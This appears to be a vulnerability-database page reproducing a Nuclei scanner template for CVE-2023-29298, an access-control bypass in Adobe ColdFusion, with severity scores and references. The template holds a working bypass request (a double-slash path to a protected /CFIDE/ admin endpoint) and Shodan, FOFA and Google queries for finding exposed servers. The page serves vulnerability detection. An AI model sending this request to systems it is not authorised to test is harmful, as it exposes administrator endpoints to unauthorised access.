Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-29298
HistoryJul 12, 2023 - 10:08 p.m.

Adobe ColdFusion - Access Control Bypass

2023-07-1222:08:33
ProjectDiscovery
github.com
17
cve2023
adobe
auth-bypass
coldfusion
kev

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.944 High

EPSS

Percentile

99.2%

An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.
id: CVE-2023-29298

info:
  name: Adobe ColdFusion - Access Control Bypass
  author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch
  severity: high
  description: |
    An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    Apply the latest security patches or updates provided by Adobe to fix the access control bypass vulnerability.
  reference:
    - https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
    - https://github.com/XRSec/AWVS-Update
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-29298
    cwe-id: CWE-284,NVD-CWE-Other
    epss-score: 0.94803
    epss-percentile: 0.99269
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - app="Adobe-ColdFusion"
      - app="adobe-coldfusion"
      - title="coldfusion administrator login"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - ([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}

      - type: dsl
        dsl:
          - contains(content_type, "text/html")
          - status_code == 200
          - len(trim_space(body)) == 106
        condition: and
# digest: 4b0a00483046022100ca404bb788ee99d73bae3af87c527baa9ea28205f053f9421747d5dcaec661de022100cd744886e5ac523b6e265391565b850abd75ec30a28faccd1a01ba9157be31cd:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.6 High

AI Score

Confidence

High

0.944 High

EPSS

Percentile

99.2%